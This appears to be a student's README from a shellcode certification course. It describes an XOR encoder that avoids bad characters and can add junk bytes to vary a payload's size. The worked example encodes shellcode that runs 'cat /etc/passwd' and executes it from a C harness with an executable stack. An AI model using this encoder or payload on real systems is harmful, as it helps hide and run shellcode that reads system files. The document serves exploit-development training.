Student ID: SLAE-1530
This repository is part of the SLAE certification process from PentesterAcademy.com
This encoder is using XOR to encode your shellcode. It support shellcode from any size and support bad characters.
Even if bad characters support wasn't required to solve the challenge, I tought it would be something cool to learn and do.
-s: Shellcode to encode (Ex: \x31\xe2...\xeb).-b: Bad chars list (Ex: \x0a\x0d), NULL is always a bad char.")-v: Enable verbose.-j: Append junk opcode at the end of the original shellcode to vary it size.-p: Check if final payload is really free of badchars (Paranoid mode).
We will use my cat /etc/passwd shellcode from https://www.phrozen.io/docs/linux/slae32/ex2-reverseshell/ paper.
local@user:# ./xor-encoder.py -s "\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x2f\x62\x89\xe3\x66\xb8\x2d\x63\x50\x31\xc0\x89\xe2\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x20\x2f\x65\x74\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe6\x50\x56\x52\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" -b "\x0a\x0d" -v -p
#include<stdio.h>
#include<string.h>
// Shellcode size = 173
unsigned char code[] = \
"\xeb\x1a\x5e\x31\xc9\x31\xc0\x31\xdb\xb1\x46\x8a\x24\x1e\x8a\x44"
"\x1e\x01\x30\xc4\x88\x26\x43\x46\xe2\xf1\xeb\x05\xe8\xe1\xff\xff"
"\xff\x14\x25\x79\xb9\x88\xd8\x56\x3e\x1e\x7c\x3e\x5f\xaf\xdc\xda"
"\xb2\xa5\xcd\x6d\x04\x60\x0e\x52\x7d\xb5\x9a\x8f\xe7\xbc\x93\xd2"
"\xfd\x4c\x63\x5c\x3e\x06\x8f\x1d\xfe\xf4\x92\x66\xde\xe8\xc5\xd3"
"\xb0\xff\xaf\x93\xa2\x62\xa2\x79\xf0\x82\x60\xa2\xf2\xfb\x93\x78"
"\x0b\x85\xf6\x26\x51\x5c\x38\xbb\xd3\x79\x1a\x4d\x62\x6a\x1a\xfa"
"\x9b\x58\x30\x9b\xbb\x92\xbd\xdb\xbe\x6f\x1b\x1e\x76\xe2\xcd\x3a"
"\x59\x09\x68\x58\x2c\xa0\xc8\x4e\x61\x81\xe3\x0f\x66\x10\x7e\xc0"
"\x49\x68\x8e\x21\x71\x26\x70\x47\x15\x2c\x7f\xcf\x46\x05\xe4\x11"
"\x41\x4b\xc2\x3a\xd8\x28\x98\x41\x4a\x6d\xa0\x16\x96";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
local@user:# gcc shellcode.c -o shellcode -z execstack && ./shellcode
